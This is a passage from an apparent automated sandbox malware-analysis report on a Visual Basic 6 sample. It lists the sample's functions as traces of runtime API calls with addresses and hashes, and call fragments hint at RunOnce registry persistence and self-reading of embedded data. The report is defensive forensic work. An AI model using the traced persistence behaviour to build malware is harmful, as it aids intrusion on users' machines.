                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425F9E
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425FA3
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00425FAC
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425FB0
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00425FB3
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00425FBC
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0042604C), ref: 00426026
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00426035
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042603A
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042603F
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00426044
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00426068
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                    • String ID: 0000
                                                                                    • API String ID: 292954213-211534962
                                                                                    • Opcode ID: 24d6d6b17887c0f3c917ea1074893c9453fe825b7dc9271a4a55e95ec63938c9
                                                                                    • Instruction ID: ae26ad25c27fd2aa879063d40509198e82445ba020206e85d6646bf00855608d
                                                                                    • Opcode Fuzzy Hash: 24d6d6b17887c0f3c917ea1074893c9453fe825b7dc9271a4a55e95ec63938c9
                                                                                    • Instruction Fuzzy Hash: AF125871E002189FDB14DFE4DD88AEEBBB5FB48301F10412AE506B72A0EB745985CF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00422050 Relevance: 143.9, APIs: 81, Strings: 1, Instructions: 403COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,00000000,Function_000032B6), ref: 0042206E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042209B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 004220AA
                                                                                    • __vbaStrCat.MSVBVM60(00408794,?,?,00000000,?,00000000,Function_000032B6), ref: 004220C0
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 004220CB
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,Function_000032B6), ref: 004220DD
                                                                                    • __vbaStrCat.MSVBVM60(00408794,?,?,00000000,?,00000000,Function_000032B6), ref: 004220F3
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 004220FE
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0042211F
                                                                                    • __vbaStrCat.MSVBVM60(00408794,00000006,00000006,?,00000000,?,00000000,Function_000032B6), ref: 00422144
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042214F
                                                                                    • #580.MSVBVM60(00000000,?,00000000,?,00000000,Function_000032B6), ref: 00422156
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042215F
                                                                                    • #598.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042216C
                                                                                    • __vbaNew2.MSVBVM60(004049C0,0042C060,0042C0F0,?,00000000,?,00000000,Function_000032B6), ref: 0042219D
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 004221D7
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 004221F8
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0042C0F0,00000000,?,00000020), ref: 0042221E
                                                                                    • #598.MSVBVM60(?,00000000,Function_000032B6), ref: 0042222E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,Function_000032B6), ref: 00422250
                                                                                    • __vbaStrCat.MSVBVM60(00408794,?,00000000,?,00000000,Function_000032B6), ref: 0042226C
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 00422277
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,00000000,Function_000032B6), ref: 00422286
                                                                                    • #598.MSVBVM60(?,00000000,Function_000032B6), ref: 00422293
                                                                                    • #648.MSVBVM60(0000000A), ref: 004222B2
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004222C1
                                                                                    • __vbaStrCat.MSVBVM60(00408794,?), ref: 004222D7
                                                                                    • __vbaFreeStr.MSVBVM60(004226E7), ref: 004226D7
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004226E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                    • String ID: 5
                                                                                    • API String ID: 3012955283-2226203566
                                                                                    • Opcode ID: b38d2dec9a9c5a407f4ed27c153f55b07beb21e57233ec5c09002560f545ea4e
                                                                                    • Instruction ID: 514902ae826528d268cef2b3f75eb0ca97d7031ef370423ce81c1c411bdef8a6
                                                                                    • Opcode Fuzzy Hash: b38d2dec9a9c5a407f4ed27c153f55b07beb21e57233ec5c09002560f545ea4e
                                                                                    • Instruction Fuzzy Hash: AD02D675900258EFDB04DFA0EE48BEEBB75FF48305F108169E502B72A0DBB45A45DB68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040C100 Relevance: 122.9, APIs: 65, Strings: 5, Instructions: 383COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • #600.MSVBVM60(?,00000002), ref: 0040C111
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C12B
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040C137
                                                                                    • #580.MSVBVM60(00000000,00000027), ref: 0040CA1A
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA32
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CA3D
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CA57
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CA62
                                                                                      • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                      • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                      • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                      • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CA7D
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA99
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CAA4
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CABD
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CAC8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CAE3
                                                                                      • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                      • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                      • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                      • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                      • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                      • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                      • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                      • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                      • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                      • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                      • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                      • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040CB52
                                                                                    • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040CB7A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CB85
                                                                                    • __vbaFreeStr.MSVBVM60(00000000), ref: 0040CB94
                                                                                    • __vbaStrCopy.MSVBVM60(80000002,00000000,00000000,80000002,00000000,00000000), ref: 0040CBE5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CBF9
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC06
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC16
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC2E
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CC42
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC4F
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC5F
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC77
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CC8B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC98
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCA8
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CCC0
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CCD4
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CCE1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCF1
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD09
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD1B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CD26
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CD3B
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040CD42
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CD4D
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD5A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CD72
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD8A
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD9C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CDA7
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CDBC
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040CDC3
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CDCE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CDDB
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CDF3
                                                                                    • __vbaStrCat.MSVBVM60(at.,00000000), ref: 0040CE0F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CE1A
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040CE28
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CE33
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE40
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE50
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE68
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CE7C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE89
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE99
                                                                                      • Part of subcall function 00411F00: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CEB3,0042C160), ref: 00411F1E
                                                                                      • Part of subcall function 00411F00: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00411F4E
                                                                                      • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(0040CEB3,?,?,?,00000000,004032B6), ref: 00411F69
                                                                                      • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F7D
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00411F86
                                                                                      • Part of subcall function 00411F00: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F97
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?,004156AF), ref: 0041565A
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415667
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415674
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415681
                                                                                      • Part of subcall function 00411F00: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041568D
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 00415696
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 0041569F
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 004156A8
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEE1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040CF27
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040CF42
                                                                                    • __vbaFreeStr.MSVBVM60(0040CFB1), ref: 0040CFA1
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040CFAA
                                                                                      • Part of subcall function 004115D0: __vbaErase.MSVBVM60(004065BC,0042C078,0000000A,-00000061,660E0EBE), ref: 00411B74
                                                                                      • Part of subcall function 004115D0: __vbaRedim.MSVBVM60(00000000,00000024,0042C078,004065BC,00000001,00000003,00000001), ref: 00411B97
                                                                                      • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411BAA
                                                                                      • Part of subcall function 004115D0: __vbaGenerateBoundsError.MSVBVM60 ref: 00411BCE
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411BFE
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?), ref: 00411C14
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411C1A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411C2C
                                                                                      • Part of subcall function 004115D0: __vbaAryUnlock.MSVBVM60(?), ref: 00411C3E
                                                                                      • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411C4F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
